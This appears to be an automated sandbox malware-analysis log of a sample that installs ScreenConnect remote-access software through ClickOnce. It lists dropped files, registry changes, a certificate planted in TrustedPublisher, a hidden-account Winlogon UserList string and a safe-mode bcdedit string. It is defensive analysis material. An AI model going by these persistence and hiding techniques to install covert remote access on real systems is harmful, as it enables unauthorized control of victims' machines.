                  Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 96r3GgxntQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 96r3GgxntQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 96r3GgxntQ.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A06C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1730092141.00000000008AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A068000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734596134.0000000005692000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 96r3GgxntQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Unpacked PE file: 11.2.ScreenConnect.ClientService.exe.5560000.0.unpack
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr Static PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: 96r3GgxntQ.exe Static PE information: real checksum: 0x212e6 should be: 0x1fbec
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
                  Source: ScreenConnect.ClientService.dll.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 27688670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 276A1FE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 860000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1A420000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 16C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 3120000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2F30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 880000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1200000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 3200000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 2C00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1AD30000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598211Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598091Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597935Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597711Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597275Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596514Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596396Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596045Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595627Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595498Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595263Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595045Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594826Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594165Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593731Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593621Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593405Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593186Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592963Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7489Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2179Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
